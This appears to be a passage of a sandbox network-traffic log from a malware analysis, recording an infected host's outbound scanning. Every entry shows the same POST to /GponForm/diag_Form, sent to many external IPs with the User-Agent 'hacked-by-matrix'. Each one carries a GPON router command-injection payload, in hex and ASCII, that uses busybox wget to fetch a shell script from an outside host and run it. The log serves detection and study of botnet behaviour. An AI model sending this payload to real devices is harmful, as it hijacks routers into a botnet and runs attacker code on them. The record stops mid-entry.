                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1769192.168.2.135520442.148.121.141443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817922115 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1770192.168.2.1342134109.58.215.80443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817948103 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1771192.168.2.134950242.181.252.39443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818011999 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1772192.168.2.1348900109.191.197.25443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818038940 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1773192.168.2.134135042.151.193.71443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818039894 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1774192.168.2.1357680118.188.237.240443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818093061 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1775192.168.2.13419885.165.76.252443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818125010 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1776192.168.2.13340125.26.80.181443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818145990 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1777192.168.2.135100242.14.112.166443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818183899 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1778192.168.2.1347494118.165.43.246443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818212032 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1779192.168.2.134492042.241.61.67443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818223953 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1780192.168.2.13479165.206.157.73443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818242073 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1781192.168.2.1336440118.52.199.173443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818294048 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1782192.168.2.1351238212.143.149.247443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818311930 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1783192.168.2.1336662118.160.108.244443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818325043 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1784192.168.2.13548065.204.199.196443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818351030 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1785192.168.2.1347938212.29.16.23443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818366051 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1786192.168.2.135936242.1.9.209443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818423033 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1787192.168.2.1360246118.165.221.193443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818454981 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1788192.168.2.13428925.85.33.211443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818456888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1789192.168.2.13456985.2.195.34443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818484068 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1790192.168.2.135472642.174.98.31443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818540096 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1791192.168.2.1339052109.246.50.8443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818559885 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
